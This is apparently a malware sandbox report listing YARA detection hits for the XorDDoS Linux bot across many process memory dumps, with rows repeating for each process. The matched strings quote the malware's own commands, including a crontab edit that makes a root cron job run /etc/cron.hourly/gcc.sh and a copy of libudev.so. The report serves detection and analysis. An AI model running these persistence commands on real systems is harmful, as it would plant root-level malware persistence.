6394.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6394.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6325.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6357.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6208.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6365.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6374.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6307.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6304.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6212.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6211.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
